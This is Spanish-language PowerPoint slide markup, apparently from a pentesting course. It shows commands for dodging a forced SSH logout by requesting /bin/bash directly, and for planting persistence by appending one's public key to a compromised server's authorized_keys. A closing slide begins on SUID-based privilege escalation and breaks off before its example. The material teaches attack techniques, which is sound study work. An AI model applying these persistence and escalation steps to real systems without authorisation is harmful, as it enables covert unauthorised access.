              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> -p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>puerto&gt;  /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a: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	O sin contraseña sería</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>usuario@dirección</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> -p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;puerto&gt;  /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>(Luego pedirá contraseña)</a:t>
            </a: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Esto sucede por que la expulsión esta configurada en el archivo de configuración de la Shell de esa cuenta de usuario, si ejecutamos otra terminal diferente antes que cargue por completo la configuración de Shell de ese usuario es probable que quedemos dentro de la sesión</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pP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1800" dirty="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
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345223" y="6011129"/>
            <a:ext cx="946736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566515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444870" y="204056"/>
            <a:ext cx="9671050" cy="769937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="b" anchorCtr="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="FEFEFE"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Comprometer conexiones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>2° </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Persistencia)</a:t>
            </a:r>
            <a:endParaRPr sz="36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63650" y="1054099"/>
            <a:ext cx="10160000" cy="5891824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Si queremos tener persistencia a una conexión SSH donde podemos ingresar con contraseña y queremos entrar sin proporcionarla en el futuro debemos modificar el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> en el servidor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Obvio claro esta que la cuenta a la que accedemos en el servidor debe tener permisos para modificarlo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Lo que se hace es en la misma línea de la conexión enviar un comando que copie el contenido de nuestra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>id_rsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> y lo meta en el fichero de claves autorizadas, de la siguiente forma:</a:t>
            </a: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a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> id_rsa.pub  |  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>usuario@servidor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>–p  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>puerto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>&gt;&gt; ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>” </a:t>
            </a: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Cada vez que entremos al servidor lo haremos sin proporcionar contraseña esto siempre el par de claves no estén configurados con contraseña extra.</a:t>
            </a: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	</a:t>
            </a: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1800" dirty="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
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345223" y="6011129"/>
            <a:ext cx="946736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816834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503593" y="136259"/>
            <a:ext cx="9671050" cy="485397"/>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2800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Comprometer ficheros SUID y SGUID</a:t>
            </a:r>
            <a:endParaRPr sz="28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654341" y="687897"/>
            <a:ext cx="11383861" cy="6258026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="40000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="2900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cuando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>un archivo binario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tiene </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>permiso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ssuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de un</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>usuario del cual podemos escalar privilegios lo siguiente que se puede hacer es</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>inyectar comandos al abrir el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>archvo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, de ahí ejecutar una terminal o ejecutar la</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>secuencia de comandos que queremos por EJ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2500" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="2500" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" smtClean="0">
                <a:solidFill>
